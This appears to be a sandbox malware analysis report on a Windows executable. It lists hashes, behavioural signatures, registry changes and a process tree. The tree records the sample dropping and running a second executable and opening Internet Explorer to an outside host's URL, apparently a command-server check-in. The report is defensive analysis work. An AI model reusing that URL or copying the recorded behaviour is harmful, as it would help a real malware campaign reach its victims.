Analysis
-
max time kernel
239s -
max time network
335s -
platform
windows7_x64 -
resource
win7-20221111-en -
resource tags
arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system -
submitted
29/11/2022, 14:51
Static task
static1
Behavioral task
behavioral1
Sample
8ee04a838484ed8401d83a29c6dfdb263f0898dfb6bdd29ef4b63b1aa0aa864b.exe
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
8ee04a838484ed8401d83a29c6dfdb263f0898dfb6bdd29ef4b63b1aa0aa864b.exe
Resource
win10v2004-20221111-en
General
-
Target
8ee04a838484ed8401d83a29c6dfdb263f0898dfb6bdd29ef4b63b1aa0aa864b.exe
-
Size
361KB
-
MD5
7378f4f2eb704b91ee48fa6f036c71d9
-
SHA1
c895fa942493de8af8f6898ddecbb315aa4a5950
-
SHA256
8ee04a838484ed8401d83a29c6dfdb263f0898dfb6bdd29ef4b63b1aa0aa864b
-
SHA512
c112fedff0000111504ff5e361136333e55f2d6c7ab42d60859c43de936ee6481c6bafd5aa894309a2b615ada8f18910f81f0d060c40e0ba797c14613d034d3e
-
SSDEEP
6144:dflfAsiL4lIJjiJcbI03GBc3ucY5DCSjX:dflfAsiVGjSGecvX
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
pid Process 1868 bujcvslhaxibyrnh.exe -
Loads dropped DLL 1 IoCs
pid Process 360 8ee04a838484ed8401d83a29c6dfdb263f0898dfb6bdd29ef4b63b1aa0aa864b.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe -
Suspicious behavior: EnumeratesProcesses 35 IoCs
pid Process 360 8ee04a838484ed8401d83a29c6dfdb263f0898dfb6bdd29ef4b63b1aa0aa864b.exe 360 8ee04a838484ed8401d83a29c6dfdb263f0898dfb6bdd29ef4b63b1aa0aa864b.exe 360 8ee04a838484ed8401d83a29c6dfdb263f0898dfb6bdd29ef4b63b1aa0aa864b.exe 360 8ee04a838484ed8401d83a29c6dfdb263f0898dfb6bdd29ef4b63b1aa0aa864b.exe 360 8ee04a838484ed8401d83a29c6dfdb263f0898dfb6bdd29ef4b63b1aa0aa864b.exe 360 8ee04a838484ed8401d83a29c6dfdb263f0898dfb6bdd29ef4b63b1aa0aa864b.exe 360 8ee04a838484ed8401d83a29c6dfdb263f0898dfb6bdd29ef4b63b1aa0aa864b.exe 360 8ee04a838484ed8401d83a29c6dfdb263f0898dfb6bdd29ef4b63b1aa0aa864b.exe 360 8ee04a838484ed8401d83a29c6dfdb263f0898dfb6bdd29ef4b63b1aa0aa864b.exe 360 8ee04a838484ed8401d83a29c6dfdb263f0898dfb6bdd29ef4b63b1aa0aa864b.exe 360 8ee04a838484ed8401d83a29c6dfdb263f0898dfb6bdd29ef4b63b1aa0aa864b.exe 360 8ee04a838484ed8401d83a29c6dfdb263f0898dfb6bdd29ef4b63b1aa0aa864b.exe 360 8ee04a838484ed8401d83a29c6dfdb263f0898dfb6bdd29ef4b63b1aa0aa864b.exe 360 8ee04a838484ed8401d83a29c6dfdb263f0898dfb6bdd29ef4b63b1aa0aa864b.exe 360 8ee04a838484ed8401d83a29c6dfdb263f0898dfb6bdd29ef4b63b1aa0aa864b.exe 360 8ee04a838484ed8401d83a29c6dfdb263f0898dfb6bdd29ef4b63b1aa0aa864b.exe 360 8ee04a838484ed8401d83a29c6dfdb263f0898dfb6bdd29ef4b63b1aa0aa864b.exe 360 8ee04a838484ed8401d83a29c6dfdb263f0898dfb6bdd29ef4b63b1aa0aa864b.exe 360 8ee04a838484ed8401d83a29c6dfdb263f0898dfb6bdd29ef4b63b1aa0aa864b.exe 360 8ee04a838484ed8401d83a29c6dfdb263f0898dfb6bdd29ef4b63b1aa0aa864b.exe 360 8ee04a838484ed8401d83a29c6dfdb263f0898dfb6bdd29ef4b63b1aa0aa864b.exe 360 8ee04a838484ed8401d83a29c6dfdb263f0898dfb6bdd29ef4b63b1aa0aa864b.exe 360 8ee04a838484ed8401d83a29c6dfdb263f0898dfb6bdd29ef4b63b1aa0aa864b.exe 360 8ee04a838484ed8401d83a29c6dfdb263f0898dfb6bdd29ef4b63b1aa0aa864b.exe 360 8ee04a838484ed8401d83a29c6dfdb263f0898dfb6bdd29ef4b63b1aa0aa864b.exe 360 8ee04a838484ed8401d83a29c6dfdb263f0898dfb6bdd29ef4b63b1aa0aa864b.exe 360 8ee04a838484ed8401d83a29c6dfdb263f0898dfb6bdd29ef4b63b1aa0aa864b.exe 360 8ee04a838484ed8401d83a29c6dfdb263f0898dfb6bdd29ef4b63b1aa0aa864b.exe 1868 bujcvslhaxibyrnh.exe 1868 bujcvslhaxibyrnh.exe 1868 bujcvslhaxibyrnh.exe 1868 bujcvslhaxibyrnh.exe 1868 bujcvslhaxibyrnh.exe 1868 bujcvslhaxibyrnh.exe 1868 bujcvslhaxibyrnh.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 460 Process not Found -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 360 wrote to memory of 1868 360 8ee04a838484ed8401d83a29c6dfdb263f0898dfb6bdd29ef4b63b1aa0aa864b.exe 28 PID 360 wrote to memory of 1868 360 8ee04a838484ed8401d83a29c6dfdb263f0898dfb6bdd29ef4b63b1aa0aa864b.exe 28 PID 360 wrote to memory of 1868 360 8ee04a838484ed8401d83a29c6dfdb263f0898dfb6bdd29ef4b63b1aa0aa864b.exe 28 PID 360 wrote to memory of 1868 360 8ee04a838484ed8401d83a29c6dfdb263f0898dfb6bdd29ef4b63b1aa0aa864b.exe 28 PID 360 wrote to memory of 1064 360 8ee04a838484ed8401d83a29c6dfdb263f0898dfb6bdd29ef4b63b1aa0aa864b.exe 29 PID 360 wrote to memory of 1064 360 8ee04a838484ed8401d83a29c6dfdb263f0898dfb6bdd29ef4b63b1aa0aa864b.exe 29 PID 360 wrote to memory of 1064 360 8ee04a838484ed8401d83a29c6dfdb263f0898dfb6bdd29ef4b63b1aa0aa864b.exe 29 PID 360 wrote to memory of 1064 360 8ee04a838484ed8401d83a29c6dfdb263f0898dfb6bdd29ef4b63b1aa0aa864b.exe 29
Processes
-
C:\Users\Admin\AppData\Local\Temp\8ee04a838484ed8401d83a29c6dfdb263f0898dfb6bdd29ef4b63b1aa0aa864b.exe"C:\Users\Admin\AppData\Local\Temp\8ee04a838484ed8401d83a29c6dfdb263f0898dfb6bdd29ef4b63b1aa0aa864b.exe"1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:360 -
C:\Temp\bujcvslhaxibyrnh.exeC:\Temp\bujcvslhaxibyrnh.exe run2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1868
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://xytets.com:2345/t.asp?os=home2⤵
- Modifies Internet Explorer settings
PID:1064
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
361KB
MD5efed6463bbdcd17c815386e8f69be69d
SHA10eb6b1346cd953b3c672e56a7dedd780b6df1868
SHA256a44e37b3720ce03a4b3e8a682ad45711404ffbc07c15a900a387bf9006d038ed
SHA512cf42bf43c9e6b868a998aa07fd0f72bda126d090d74dce3b683c5de80c082a77fb3505bdf0a464ab18e98d76c834f077f69d16af8c65d571adf3a50c7cb39c77
-
Filesize
361KB
MD5efed6463bbdcd17c815386e8f69be69d
SHA10eb6b1346cd953b3c672e56a7dedd780b6df1868
SHA256a44e37b3720ce03a4b3e8a682ad45711404ffbc07c15a900a387bf9006d038ed
SHA512cf42bf43c9e6b868a998aa07fd0f72bda126d090d74dce3b683c5de80c082a77fb3505bdf0a464ab18e98d76c834f077f69d16af8c65d571adf3a50c7cb39c77